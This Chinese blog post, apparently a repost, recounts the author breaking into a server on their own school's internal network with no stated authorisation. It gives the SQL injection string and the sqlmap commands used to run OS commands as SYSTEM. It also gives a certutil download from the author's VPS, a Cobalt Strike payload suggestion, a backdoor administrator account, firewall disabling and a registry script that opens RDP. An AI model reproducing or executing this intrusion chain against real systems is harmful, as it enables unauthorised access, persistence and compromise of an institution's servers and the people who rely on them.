记一次不曲折的校内站点渗透

分手后的思念是犯贱 2024-04-07 10:40 158阅读 0赞

0x01 前言

备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑)

14ca6764457ea241481e43c8036e94b2.png

0x02 渗透过程

测试到注入

http://url/newdetail.aspx?id=11999‘ or 1=1 —

直接Sqlmap一把过 , 连waf都没得(狗头)

81386ff327d41314f06241355472cb31.png

随便看看

  1. python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbs
  2. python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users

ab0a3eae13623c1f1a212c47268c3966.png

DBMS

sqlserver 2005

14f46bff8fc6db86b4cfe600ad6c4b64.png

whoami

在windows中nt authority system 是内置的系统管理账户

ca4b8f04f67e0d483c9b9bb2271c88ab.png

查看下目录chdir

d04c47d7b68720b0081728147a23c1c0.png

Dir c:\

394e37432d048cb0fc31c61f391f57e7.png

OS版本

Microsoft(R) Windows(R) Server 2003, Enterprise Edition

9ee08c962166a7aaba5a9a34fe401764.png

ipconfig

7c35407ac637b81b26d53e665b58c2ec.png

服务器端存在certutil等于是决定测试一下命令

vps

  1. python -m SimpleHTTPServer 80

打一下

  1. ping wt070h.dnslog.cn
  2. certutil.exe -urlcache -split -f http://funny_ip/amazing1x

发现回显

5282ccb66ae8380e3ef4439940f822a1.png

奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果

a3583a02f0cb33af1053b8723748ac5c.png

看看环境变量

c54f4e90eb449f8dffa95564a6ed164a.png

Nmap看看端口

因为尝试远程连接的时候出了一些问题,起初不知道是什么原因所以打算看看

fe6c43b39b573deb8ad49d2c8eaa53be.png

尝试远程连接3389

新建用户

  1. #新建用户
  2. net user amazingadmin123 amazing.123456 /add
  3. #赋予权限
  4. net localgroup Administrators amazingadmin123 /add
  5. #激活用户
  6. net user amazingadmin123 /active:yes
  7. #关闭防火墙
  8. netsh firewall set opmode mode=disable
  9. #开启默认设置 netsh firewall reset

通过注册表开启3389端口

  1. echo Windows Registry Editor Version 5.00 >>3389.reg
  2. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
  3. echo "fDenyTSConnections"=dword:00000000 >>3389.reg
  4. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg 
  5. echo "ortNumber"=dword:00000D3D >>3389.reg
  6. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
  7. echo "PortNumber"=dword:00000D3D >>3389.reg
  8. regedit /s 3389.reg

相关记录

55be5ea55e83294aa278f117f0cd643e.png

相关记录

bfb5d664e8e94807cc9e2baa7bae03a4.png

这个过程连续尝试了两三次都没有成功,也没找到原因,服务还关了,只能先考试等管理员开机了

c78e1fbe925a526fc0706a248a2890bf.png

考完试第三天网站上线了,再试试新建用户……

原来是安全策略的问题,不能使用简单地密码,新建用户的时候用了个复杂的密码就行了

远程连接✔️

2dfab5486d19d997e25be6803f05167f.png

配置加载中……

05ed456528af96af4c09186119340f95.png

dc1f49ce7cd06d143d3886a6affa1d55.png

0x03 总结

1.发现主页存在一处注入点

http://url/newdetail.aspx?id=11999‘ or 1=1 —

2.通过SQLMAP进行注入,执行命令:

sql-shell>select @@version; //查询数据库版本

sql-os>whoami //发现是system权限

sql-os>chdir //查看目录

sql-os>dir c: //列出C盘目录

sql-os>systeminfo //查看系统版本

sql-os>ipconfig //查看系统IP

sql-os>cuertutil //测试是否存在cuertutil 下载命令

3.在VPS搭建HTTP服务器

python -m SimpleHTTPServer 80

4.可以将cs生成exe上传到VPS服务器上。

5.通过NAMP扫描目标系统开放端口,发现3389存在

6.创建用户并添加到管理员权限,且启用账号和关闭防火功能

#新建用户

sql-os>net user amazingadmin123 Admin@12$12 /add

#赋予权限

sql-os>net localgroup Administrators amazingadmin123 /add

#激活用户

sql-os>net user amazingadmin123 /active:yes

#关闭防火墙

sql-os>netsh firewall set opmode mode=disable

7.通过mstsc成功远程连接

#

原文链接: https://xz.aliyun.com/t/9444

发表评论

表情:
评论列表 (有 0 条评论,158人围观)

还没有评论,来说两句吧...

相关阅读

    相关 完整内网渗透经历

    故事的起因比较简单,用三个字来概括吧:闲得慌。 因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了

    水深无声水深无声/ 0/ 183 阅读